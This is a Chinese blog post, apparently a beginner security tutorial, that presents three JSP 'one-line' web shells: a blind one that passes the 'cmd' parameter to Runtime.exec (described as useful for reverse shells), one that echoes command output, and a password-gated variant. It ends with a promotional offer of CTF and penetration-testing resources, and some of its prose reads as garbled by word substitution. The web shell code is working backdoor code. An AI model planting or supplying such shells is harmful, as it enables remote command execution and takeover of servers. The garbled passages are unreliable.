java安全——jsp一句话木马
jsp回显一句话木马文章目次
[*]jsp回显一句话木马
[*]一、搭建web服务
[*] * 1、创建空白maven项目,搭建本地tomcat
[*]2、引入servlet的pom依赖
[*]二、无回显一句话
[*]三、带回显一句话
[*]三、有密码带回显一句话
提示:以下是本篇文章正文内容,下面案例可供参考
一、搭建web服务
1、创建空白maven项目,搭建本地tomcat
https://i-blog.csdnimg.cn/blog_migrate/c891b90e07bb3f70cf4cd81a9cbddbea.png
https://i-blog.csdnimg.cn/blog_migrate/cd7b577558a663021126c510d5b6efa4.png
2、引入servlet的pom依赖
https://i-blog.csdnimg.cn/blog_migrate/88539da3ae4785d426261b8a48a3558a.png
二、无回显一句话
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的效果只能在配景打印一个地点,常用来反弹shell
https://i-blog.csdnimg.cn/blog_migrate/a6a55a4981d94aead8eb9b9e22ddf270.png
三、带回显一句话
代码如下(示例):
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
%>
https://i-blog.csdnimg.cn/blog_migrate/4431fc9ff58346ce04f59df54ee47ba8.png
三、有密码带回显一句话
<%
if ("password".equals(request.getParameter("pass"))){
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
// System.out.println(process);
InputStream inputStream = process.getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null){
response.getWriter().println(line);
}
}
%>
https://i-blog.csdnimg.cn/blog_migrate/a24209b8dbcfcd21abe0741706ff642e.png
最后
从期间发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同砚们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,本领越强时机才越多。
由于入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我包管知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货主要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(得当小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里
页:
[1]